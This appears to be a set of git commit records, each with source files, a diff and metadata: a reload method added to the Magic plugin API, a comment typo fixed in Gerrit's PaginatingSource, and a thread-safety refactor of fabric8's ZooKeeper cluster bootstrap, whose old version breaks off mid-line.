Wand finds this item in a Player's inventory. * * @param spellKey The Spell to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createSpellItem(String spellKey); /** * Create an ItemStack that represents a Material Brush. * * This item will be absorbed by a Wand on activate, adding that brush * to the Wand, if the Wand finds this item in a Player's inventory. * * @param brushKey The Material brush to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createBrushItem(String brushKey); /** * Return a list of all known LostWand records. * * @return A list of all known LostWand data. */ public Collection<LostWand> getLostWands(); /** * Forget a specific LostWand. * * The ItemStack will not be removed if it still exists, and * a new LostWand record may get created if the ItemStack is found * again by the Chunk scanner. * * @param id The id of the LostWand to forget. */ public void removeLostWand(String id); /** * Get a list of all known Automaton records. * * @return The list of currently known Automaton blocks. */ public Collection<Automaton> getAutomata(); /** * Cast a specific Spell, with optional parameters. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * This Spell will be cast using the COMMAND Mage. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters); /** * Cast a specific Spell, with optional parameters, using a specific CommandSender and/or Player. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * The CommandSender and Player may differ, in which case both will be notified of Spell results. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @param sender The CommandSender that originated this Spell * @param entity The Entity this Spell is cast on behalf of, may be Player or differ from sender * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters, CommandSender sender, Entity entity); public boolean cast(String spellName, ConfigurationSection parameters, CommandSender sender, Entity entity); /** * Get a list of all currently loaded SpellTemplate records, as defined in spells.defaults.yml * and spells.yml * * A Spell is created for a Mage from a SpellTemplate. * * @return A list of all known SpellTemplate definitions. */ public Collection<SpellTemplate> getSpellTemplates(); public Collection<SpellTemplate> getSpellTemplates(boolean showHidden); /** * Retrieve a specific SpellTemplate. * * @param key The key of the SpellTemplate to look up. * @return The requested SpellTemplate, or null on failure. */ public SpellTemplate getSpellTemplate(String key); /** * Get a list of all valid Material Brush names. * * This will include all Block Materials, as well as special brushes * (copy, clone, erase, replicate, map) and any known schematic brushes. * * @return A list of all valid brush keys. */ public Collection<String> getBrushes(); /** * Get a list of all known schematics. * * These will be loaded from Magic's built-in schematic collection, * or from an external source (e.g. WorldEdit). * * The list may be empty if schematics are disabled. * * These are the raw schematic names, and do not have the "schematic:" prefix or ".schematic" extension. * * @return The list of known schematic names. */ public Collection<String> getSchematicNames(); /** * Get the MageController. * * The controller is used for more advanced plugin interaction, and is * used heavily by Spells themselves to interact with the Magic plugin's * internal functionality. * * @return The current MageController, there is only one. */ public MageController getController(); /** * Returns a written book item describing all of the spells in * a given category. * * @param category The category to look up * @param count How many to give (max 1 stack) * @return An ItemStack spell book */ public ItemStack getSpellBook(SpellCategory category, int count); /** * Return the Messages controller, which manages Magic's * localization store. */ public Messages getMessages(); }
Add a reload method that can provide feedback to a CommandSender
src/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java
Add a reload method that can provide feedback to a CommandSender
<ide><path>rc/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java <ide> public void reload(); <ide> <ide> /** <add> * Reload all Magic configurations, report success/fail to sender <add> */ <add> public void reload(CommandSender sender); <add> <add> /** <ide> * Clear all image and schematic caches <ide> */ <ide> public void clearCache();
Java
apache-2.0
303e66e42258ca419cd5431d7a0fb071e4643a85
0
GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit
// Copyright (C) 2022 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.index.query; import static com.google.common.base.Preconditions.checkArgument; import com.google.common.collect.FluentIterable; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Ordering; import com.google.gerrit.exceptions.StorageException; import com.google.gerrit.index.IndexConfig; import com.google.gerrit.index.PaginationType; import com.google.gerrit.index.QueryOptions; import java.util.ArrayList; import java.util.List; public class PaginatingSource<T> implements DataSource<T> { protected final DataSource<T> source; private final int start; private final int cardinality; private final IndexConfig indexConfig; public PaginatingSource(DataSource<T> source, int start, IndexConfig indexConfig) { checkArgument(start >= 0, "negative start: %s", start); this.source = source; this.start = start; this.cardinality = source.getCardinality(); this.indexConfig = indexConfig; } @Override public ResultSet<T> read() { if (source == null) { throw new StorageException("No DataSource: " + this); } // ResultSets are lazy. Calling #read here first and then dealing with ResultSets only when // requested allows the index to run asynchronous queries. ResultSet<T> resultSet = source.read(); return new LazyResultSet<>( () -> { List<T> r = new ArrayList<>(); T last = null; int pageResultSize = 0; for (T data : buffer(resultSet)) { if (!isMatchable() || match(data)) { r.add(data); } last = data; pageResultSize++; } if (last != null && source instanceof Paginated) { // Restart source and continue if we have not filled the // full limit the caller wants. // @SuppressWarnings("unchecked") Paginated<T> p = (Paginated<T>) source; QueryOptions opts = p.getOptions(); final int limit = opts.limit(); int pageSize = opts.pageSize(); int pageSizeMultiplier = opts.pageSizeMultiplier(); Object searchAfter = resultSet.searchAfter(); int nextStart = pageResultSize; while (pageResultSize == pageSize && r.size() <= limit) { // get 1 more than the limit pageSize = getNextPageSize(pageSize, pageSizeMultiplier); ResultSet<T> next = indexConfig.paginationType().equals(PaginationType.SEARCH_AFTER) ? p.restart(searchAfter, pageSize) : p.restart(nextStart, pageSize); pageResultSize = 0; for (T data : buffer(next)) { if (match(data)) { r.add(data); } pageResultSize++; } nextStart += pageResultSize; searchAfter = next.searchAfter(); } } if (start >= r.size()) { return ImmutableList.of(); } else if (start > 0) { return ImmutableList.copyOf(r.subList(start, r.size())); } return ImmutableList.copyOf(r); }); } @Override public ResultSet<FieldBundle> readRaw() { // TODO(hiesel): Implement throw new UnsupportedOperationException("not implemented"); } private Iterable<T> buffer(ResultSet<T> scanner) { return FluentIterable.from(Iterables.partition(scanner, 50)) .transformAndConcat(this::transformBuffer); } /** * Checks whether the given object matches. * * @param object the object to be matched * @return whether the given object matches */ protected boolean match(T object) { return true; } protected boolean isMatchable() { return true; } protected List<T> transformBuffer(List<T> buffer) { return buffer; } @Override public int getCardinality() { return cardinality; } private int getNextPageSize(int pageSize, int pageSizeMultiplier) { List<Integer> possiblePageSizes = new ArrayList<>(3); try { possiblePageSizes.add(Math.multiplyExact(pageSize, pageSizeMultiplier)); } catch (ArithmeticException e) { possiblePageSizes.add(Integer.MAX_VALUE); } if (indexConfig.maxPageSize() > 0) { possiblePageSizes.add(indexConfig.maxPageSize()); } if (indexConfig.maxLimit() > 0) { possiblePageSizes.add(indexConfig.maxLimit()); } return Ordering.natural().min(possiblePageSizes); } }
java/com/google/gerrit/index/query/PaginatingSource.java
// Copyright (C) 2022 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.index.query; import static com.google.common.base.Preconditions.checkArgument; import com.google.common.collect.FluentIterable; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Ordering; import com.google.gerrit.exceptions.StorageException; import com.google.gerrit.index.IndexConfig; import com.google.gerrit.index.PaginationType; import com.google.gerrit.index.QueryOptions; import java.util.ArrayList; import java.util.List; public class PaginatingSource<T> implements DataSource<T> { protected final DataSource<T> source; private final int start; private final int cardinality; private final IndexConfig indexConfig; public PaginatingSource(DataSource<T> source, int start, IndexConfig indexConfig) { checkArgument(start >= 0, "negative start: %s", start); this.source = source; this.start = start; this.cardinality = source.getCardinality(); this.indexConfig = indexConfig; } @Override public ResultSet<T> read() { if (source == null) { throw new StorageException("No DataSource: " + this); } // ResultSets are lazy. Calling #read here first and then dealing with ResultSets only when // requested allows the index to run asynchronous queries. ResultSet<T> resultSet = source.read(); return new LazyResultSet<>( () -> { List<T> r = new ArrayList<>(); T last = null; int pageResultSize = 0; for (T data : buffer(resultSet)) { if (!isMatchable() || match(data)) { r.add(data); } last = data; pageResultSize++; } if (last != null && source instanceof Paginated) { // Restart source and continue if we have not filled the // full limit the caller wants. // @SuppressWarnings("unchecked") Paginated<T> p = (Paginated<T>) source; QueryOptions opts = p.getOptions(); final int limit = opts.limit(); int pageSize = opts.pageSize(); int pageSizeMultiplier = opts.pageSizeMultiplier(); Object searchAfter = resultSet.searchAfter(); int nextStart = pageResultSize; while (pageResultSize == pageSize && r.size() <= limit) { // get 1 more than the limit pageSize = getNextPageSize(pageSize, pageSizeMultiplier); ResultSet<T> next = indexConfig.paginationType().equals(PaginationType.SEARCH_AFTER) ? p.restart(searchAfter, pageSize) : p.restart(nextStart, pageSize); pageResultSize = 0; for (T data : buffer(next)) { if (match(data)) { r.add(data); } pageResultSize++; } nextStart += pageResultSize; searchAfter = next.searchAfter(); } } if (start >= r.size()) { return ImmutableList.of(); } else if (start > 0) { return ImmutableList.copyOf(r.subList(start, r.size())); } return ImmutableList.copyOf(r); }); } @Override public ResultSet<FieldBundle> readRaw() { // TOOD(hiesel): Implement throw new UnsupportedOperationException("not implemented"); } private Iterable<T> buffer(ResultSet<T> scanner) { return FluentIterable.from(Iterables.partition(scanner, 50)) .transformAndConcat(this::transformBuffer); } /** * Checks whether the given object matches. * * @param object the object to be matched * @return whether the given object matches */ protected boolean match(T object) { return true; } protected boolean isMatchable() { return true; } protected List<T> transformBuffer(List<T> buffer) { return buffer; } @Override public int getCardinality() { return cardinality; } private int getNextPageSize(int pageSize, int pageSizeMultiplier) { List<Integer> possiblePageSizes = new ArrayList<>(3); try { possiblePageSizes.add(Math.multiplyExact(pageSize, pageSizeMultiplier)); } catch (ArithmeticException e) { possiblePageSizes.add(Integer.MAX_VALUE); } if (indexConfig.maxPageSize() > 0) { possiblePageSizes.add(indexConfig.maxPageSize()); } if (indexConfig.maxLimit() > 0) { possiblePageSizes.add(indexConfig.maxLimit()); } return Ordering.natural().min(possiblePageSizes); } }
PaginatingSource: Fix typo Release-Notes: skip Signed-off-by: Edwin Kempin <[email protected]> Change-Id: Ib7395d80d1378b39181180ffed44053ab26906bf
java/com/google/gerrit/index/query/PaginatingSource.java
PaginatingSource: Fix typo
<ide><path>ava/com/google/gerrit/index/query/PaginatingSource.java <ide> <ide> @Override <ide> public ResultSet<FieldBundle> readRaw() { <del> // TOOD(hiesel): Implement <add> // TODO(hiesel): Implement <ide> throw new UnsupportedOperationException("not implemented"); <ide> } <ide>
Java
apache-2.0
d61b4d186e3c741d32c21aaa55bd606134e09061
0
mwringe/fabric8,christian-posta/fabric8,mwringe/fabric8,dhirajsb/fuse,rmarting/fuse,ffang/fuse-1,jludvice/fabric8,EricWittmann/fabric8,rajdavies/fabric8,rmarting/fuse,KurtStam/fabric8,rajdavies/fabric8,punkhorn/fabric8,dhirajsb/fabric8,chirino/fabric8v2,PhilHardwick/fabric8,aslakknutsen/fabric8,joelschuster/fuse,jludvice/fabric8,opensourceconsultant/fuse,zmhassan/fabric8,opensourceconsultant/fuse,punkhorn/fuse,migue/fabric8,rnc/fabric8,chirino/fabric8,gashcrumb/fabric8,ffang/fuse-1,EricWittmann/fabric8,hekonsek/fabric8,chirino/fabric8,rmarting/fuse,christian-posta/fabric8,christian-posta/fabric8,sobkowiak/fabric8,hekonsek/fabric8,avano/fabric8,jimmidyson/fabric8,KurtStam/fabric8,sobkowiak/fabric8,janstey/fuse-1,hekonsek/fabric8,chirino/fuse,janstey/fuse,migue/fabric8,PhilHardwick/fabric8,rnc/fabric8,jimmidyson/fabric8,dhirajsb/fabric8,gnodet/fuse,cunningt/fuse,gashcrumb/fabric8,gashcrumb/fabric8,KurtStam/fabric8,rajdavies/fabric8,zmhassan/fabric8,janstey/fuse,janstey/fuse,rhuss/fabric8,ffang/fuse-1,rnc/fabric8,rhuss/fabric8,chirino/fabric8v2,gashcrumb/fabric8,punkhorn/fabric8,christian-posta/fabric8,tadayosi/fuse,KurtStam/fabric8,rajdavies/fabric8,chirino/fabric8,jboss-fuse/fuse,PhilHardwick/fabric8,cunningt/fuse,janstey/fuse-1,rnc/fabric8,hekonsek/fabric8,rhuss/fabric8,tadayosi/fuse,PhilHardwick/fabric8,jimmidyson/fabric8,janstey/fuse,sobkowiak/fabric8,avano/fabric8,jboss-fuse/fuse,jludvice/fabric8,mwringe/fabric8,jludvice/fabric8,jonathanchristison/fabric8,jonathanchristison/fabric8,aslakknutsen/fabric8,sobkowiak/fabric8,gnodet/fuse,janstey/fabric8,jimmidyson/fabric8,dejanb/fuse,dhirajsb/fabric8,avano/fabric8,dhirajsb/fabric8,chirino/fuse,punkhorn/fabric8,janstey/fabric8,aslakknutsen/fabric8,joelschuster/fuse,jonathanchristison/fabric8,dejanb/fuse,chirino/fabric8v2,sobkowiak/fuse,joelschuster/fuse,sobkowiak/fuse,opensourceconsultant/fuse,mwringe/fabric8,migue/fabric8,EricWittmann/fabric8,jonathanchristison/fabric8,avano/fabric8,punkhorn/fabric8,punkhorn/fuse,jboss-fuse/fuse,janstey/fuse-1,zmhassan/fabric8,gnodet/fuse,rnc/fabric8,dejanb/fuse,gnodet/fuse,chirino/fabric8,zmhassan/fabric8,hekonsek/fabric8,janstey/fabric8,dhirajsb/fuse,chirino/fabric8v2,rhuss/fabric8,migue/fabric8,EricWittmann/fabric8,jimmidyson/fabric8
/** * Copyright (C) FuseSource, Inc. * http://fusesource.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.fusesource.fabric.internal; import org.apache.curator.framework.CuratorFramework; import org.apache.felix.scr.annotations.Activate; import org.apache.felix.scr.annotations.Component; import org.apache.felix.scr.annotations.Deactivate; import org.apache.felix.scr.annotations.Reference; import org.apache.felix.scr.annotations.Service; import org.apache.zookeeper.KeeperException; import org.fusesource.fabric.api.CreateEnsembleOptions; import org.fusesource.fabric.api.DataStore; import org.fusesource.fabric.api.DataStoreRegistrationHandler; import org.fusesource.fabric.api.FabricException; import org.fusesource.fabric.api.FabricService; import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; import org.fusesource.fabric.api.jcip.GuardedBy; import org.fusesource.fabric.api.jcip.Immutable; import org.fusesource.fabric.api.jcip.ThreadSafe; import org.fusesource.fabric.api.scr.AbstractComponent; import org.fusesource.fabric.api.scr.ValidatingReference; import org.fusesource.fabric.utils.HostUtils; import org.fusesource.fabric.utils.OsgiUtils; import org.fusesource.fabric.zookeeper.ZkDefs; import org.osgi.framework.Bundle; import org.osgi.framework.BundleContext; import org.osgi.framework.BundleException; import org.osgi.service.cm.Configuration; import org.osgi.service.cm.ConfigurationAdmin; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.io.StringWriter; import java.net.UnknownHostException; import java.util.Collections; import java.util.Dictionary; import java.util.Hashtable; import java.util.Map; import java.util.Properties; import static org.fusesource.fabric.utils.BundleUtils.instalBundle; import static org.fusesource.fabric.utils.BundleUtils.installOrStopBundle; import static org.fusesource.fabric.utils.Ports.mapPortToRange; import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; @ThreadSafe @Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) // Done @Service(ZooKeeperClusterBootstrap.class) public final class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); @Reference(referenceInterface = ConfigurationAdmin.class) private final ValidatingReference<ConfigurationAdmin> configAdmin = new ValidatingReference<ConfigurationAdmin>(); @Reference(referenceInterface = DataStoreRegistrationHandler.class) private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); @Immutable static class ComponentState { private final Map<String, String> configuration; private final BundleContext bundleContext; ComponentState (BundleContext bundleContext, Map<String,String> configuration) { this.bundleContext = bundleContext; this.configuration = Collections.unmodifiableMap(configuration); } Map<String, String> getConfiguration() { return configuration; } BundleContext getBundleContext() { return bundleContext; } } @GuardedBy("this") private ComponentState componentState; @Activate synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { componentState = new ComponentState (bundleContext, configuration); new Thread(new Runnable() { @Override public void run() { createOnActivate(); activateComponent(); } }).start(); } @Deactivate synchronized void deactivate() { deactivateComponent(); } synchronized ComponentState getComponentState() { return componentState; } private void createOnActivate() { org.apache.felix.utils.properties.Properties userProps = null; try { userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); } catch (IOException e) { LOGGER.warn("Failed to load users from etc/users.properties. No users will be imported.", e); } CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); if (createOpts.isEnsembleStart()) { createInternal(createOpts); } } @Override public void create(CreateEnsembleOptions options) { assertValid(); createInternal(options); } private synchronized void createInternal(CreateEnsembleOptions options) { try { int minimumPort = options.getMinimumPort(); int maximumPort = options.getMaximumPort(); String zooKeeperServerHost = options.getBindAddress(); int zooKeeperServerPort = options.getZooKeeperServerPort(); int zooKeeperServerConnectionPort = options.getZooKeeperServerConnectionPort(); int mappedPort = mapPortToRange(zooKeeperServerPort, minimumPort, maximumPort); String connectionUrl = getConnectionAddress() + ":" + zooKeeperServerConnectionPort; // Create configuration updateDataStoreConfig(options.getDataStoreProperties()); createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); Map<String, String> configuration = getComponentState().getConfiguration(); registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); // Create the client configuration createZooKeeeperConfig(connectionUrl, options); // Reset the autostart flag if (options.isEnsembleStart()) { System.setProperty(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); File file = new File(System.getProperty("karaf.base") + "/etc/system.properties"); org.apache.felix.utils.properties.Properties props = new org.apache.felix.utils.properties.Properties(file); props.put(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); props.save(); } startBundles(options); //Wait until Fabric Service becomes available. OsgiUtils.waitForSerice(FabricService.class, null, FABRIC_SERVICE_TIMEOUT ); } catch (Exception e) { throw new FabricException("Unable to create zookeeper server configuration", e); } } @Override public void clean() { assertValid(); try { BundleContext bundleContext = componentState.getBundleContext(); Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", "mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); for (; ; ) { Configuration[] configs = configAdmin.get().listConfigurations("(|(service.factoryPid=org.fusesource.fabric.zookeeper.server)(service.pid=org.fusesource.fabric.zookeeper))"); if (configs != null && configs.length > 0) { for (Configuration config : configs) { config.delete(); } Thread.sleep(100); } else { break; } } File zkDir = new File("data/zookeeper"); if (zkDir.isDirectory()) { File newZkDir = new File("data/zookeeper." + System.currentTimeMillis()); if (!zkDir.renameTo(newZkDir)) { newZkDir = zkDir; } delete(newZkDir); } bundleFabricZooKeeper.start(); } catch (Exception e) { throw new FabricException("Unable to delete zookeeper configuration", e); } } private void updateDataStoreConfig(Map<String, String> dataStoreConfiguration) throws IOException { boolean updated = false; Configuration config = configAdmin.get().getConfiguration(DataStore.DATASTORE_TYPE_PID); Dictionary<String, Object> properties = config.getProperties(); for (Map.Entry<String, String> entry : dataStoreConfiguration.entrySet()) { String key = entry.getKey(); String value = entry.getValue(); if (!value.equals(properties.put(key, value))) { updated = true; } } if (updated) { //We unbind, so that we know exactly when we get the re-configured instance. //dataStoreRegistrationHandler.unbind(); config.setBundleLocation(null); config.update(properties); } } /** * Creates ZooKeeper server configuration */ private void createZooKeeeperServerConfig(String serverHost, int serverPort, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().createFactoryConfiguration("org.fusesource.fabric.zookeeper.server"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.server.properties"); } properties.put("tickTime", "2000"); properties.put("initLimit", "10"); properties.put("syncLimit", "5"); properties.put("dataDir", "data/zookeeper/0000"); properties.put("clientPort", Integer.toString(serverPort)); properties.put("clientPortAddress", serverHost); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper.server-0000"); config.setBundleLocation(null); config.update(properties); } /** * Creates ZooKeeper client configuration. * @param connectionUrl * @param options * @throws IOException */ private void createZooKeeeperConfig(String connectionUrl, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().getConfiguration("org.fusesource.fabric.zookeeper"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.properties"); } properties.put("zookeeper.url", connectionUrl); properties.put("zookeeper.timeout", System.getProperties().containsKey("zookeeper.timeout") ? System.getProperties().getProperty("zookeeper.timeout") : "30000"); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper"); properties.put("zookeeper.password", options.getZookeeperPassword()); config.setBundleLocation(null); config.update(properties); } private void startBundles(CreateEnsembleOptions options) throws BundleException { // Install or stop the fabric-configadmin bridge BundleContext bundleContext = getComponentState().getBundleContext(); Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", "mvn:org.fusesource.fabric/fabric-configadmin/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricCommands = instalBundle(bundleContext, "org.fusesource.fabric.fabric-commands ", "mvn:org.fusesource.fabric/fabric-commands/" + FabricConstants.FABRIC_VERSION); bundleFabricCommands.start(); bundleFabricConfigAdmin.start(); //Check if the agent is configured to auto start. if (options.isAgentEnabled()) { bundleFabricAgent.start(); } } private void loadPropertiesFrom(Hashtable hashtable, String from) { InputStream is = null; Properties properties = new Properties(); try { is = new FileInputStream(from); properties.load(is); for (String key : properties.stringPropertyNames()) { hashtable.put(key, properties.get(key)); } } catch (Exception e) { // Ignore } finally { if (is != null) { try { is.close(); } catch (Exception e) { // Ignore } } } } private static void delete(File dir) { if (dir.isDirectory()) { for (File child : dir.listFiles()) { delete(child); } } if (dir.exists()) { dir.delete(); } } private static String getConnectionAddress() throws UnknownHostException { String resolver = System.getProperty(ZkDefs.LOCAL_RESOLVER_PROPERTY, System.getProperty(ZkDefs.GLOBAL_RESOLVER_PROPERTY, ZkDefs.LOCAL_HOSTNAME)); if (resolver.equals(ZkDefs.LOCAL_HOSTNAME)) { return HostUtils.getLocalHostName(); } else if (resolver.equals(ZkDefs.LOCAL_IP)) { return HostUtils.getLocalIp(); } else if (resolver.equals(ZkDefs.MANUAL_IP) && System.getProperty(ZkDefs.MANUAL_IP) != null) { return System.getProperty(ZkDefs.MANUAL_IP); } else return HostUtils.getLocalHostName(); } private static String toString(Properties source) throws IOException { StringWriter writer = new StringWriter(); source.store(writer, null); return writer.toString(); } private static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { try { String v = getStringData(client, file); if (v != null) { return DataStoreHelpers.toProperties(v); } else { return defaultValue; } } catch (KeeperException.NoNodeException e) { return defaultValue; } } void bindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(service); } void unbindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(null); } void bindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(service); } void unbindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(null); } }
fabric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java
/** * Copyright (C) FuseSource, Inc. * http://fusesource.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.fusesource.fabric.internal; import org.apache.curator.framework.CuratorFramework; import org.apache.felix.scr.annotations.Activate; import org.apache.felix.scr.annotations.Component; import org.apache.felix.scr.annotations.Deactivate; import org.apache.felix.scr.annotations.Reference; import org.apache.felix.scr.annotations.Service; import org.apache.zookeeper.KeeperException; import org.fusesource.fabric.api.CreateEnsembleOptions; import org.fusesource.fabric.api.DataStore; import org.fusesource.fabric.api.DataStoreRegistrationHandler; import org.fusesource.fabric.api.FabricException; import org.fusesource.fabric.api.FabricService; import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; import org.fusesource.fabric.api.scr.AbstractComponent; import org.fusesource.fabric.api.scr.ValidatingReference; import org.fusesource.fabric.utils.HostUtils; import org.fusesource.fabric.utils.OsgiUtils; import org.fusesource.fabric.zookeeper.ZkDefs; import org.osgi.framework.Bundle; import org.osgi.framework.BundleContext; import org.osgi.framework.BundleException; import org.osgi.service.cm.Configuration; import org.osgi.service.cm.ConfigurationAdmin; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.io.StringWriter; import java.net.UnknownHostException; import java.util.Dictionary; import java.util.Hashtable; import java.util.Map; import java.util.Properties; import static org.fusesource.fabric.utils.BundleUtils.instalBundle; import static org.fusesource.fabric.utils.BundleUtils.installOrStopBundle; import static org.fusesource.fabric.utils.Ports.mapPortToRange; import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; @Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) @Service(ZooKeeperClusterBootstrap.class) public class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); @Reference(referenceInterface = ConfigurationAdmin.class) private final ValidatingReference<ConfigurationAdmin> configAdmin = new ValidatingReference<ConfigurationAdmin>(); @Reference(referenceInterface = DataStoreRegistrationHandler.class) private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); private Map<String, String> configuration; private BundleContext bundleContext; @Activate synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { this.bundleContext = bundleContext; activateComponent(); try { this.configuration = configuration; new Thread(new Runnable() { @Override public void run() { create(); } }).start(); } catch (RuntimeException rte) { deactivateComponent(); throw rte; } } @Deactivate synchronized void deactivate() { deactivateComponent(); } void create() { org.apache.felix.utils.properties.Properties userProps = null; try { userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); } catch (IOException e) { LOGGER.warn("Failed to load users from etc/users.properties. No users will be imported.", e); } CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); if (createOpts.isEnsembleStart()) { create(createOpts); } } public void create(CreateEnsembleOptions options) { try { int minimumPort = options.getMinimumPort(); int maximumPort = options.getMaximumPort(); String zooKeeperServerHost = options.getBindAddress(); int zooKeeperServerPort = options.getZooKeeperServerPort(); int zooKeeperServerConnectionPort = options.getZooKeeperServerConnectionPort(); int mappedPort = mapPortToRange(zooKeeperServerPort, minimumPort, maximumPort); String connectionUrl = getConnectionAddress() + ":" + zooKeeperServerConnectionPort; // Create configuration updateDataStoreConfig(options.getDataStoreProperties()); createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); // Create the client configuration createZooKeeeperConfig(connectionUrl, options); // Reset the autostart flag if (options.isEnsembleStart()) { System.setProperty(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); File file = new File(System.getProperty("karaf.base") + "/etc/system.properties"); org.apache.felix.utils.properties.Properties props = new org.apache.felix.utils.properties.Properties(file); props.put(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); props.save(); } startBundles(options); //Wait until Fabric Service becomes available. OsgiUtils.waitForSerice(FabricService.class, null, FABRIC_SERVICE_TIMEOUT ); } catch (Exception e) { throw new FabricException("Unable to create zookeeper server configuration", e); } } public void clean() { try { Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", 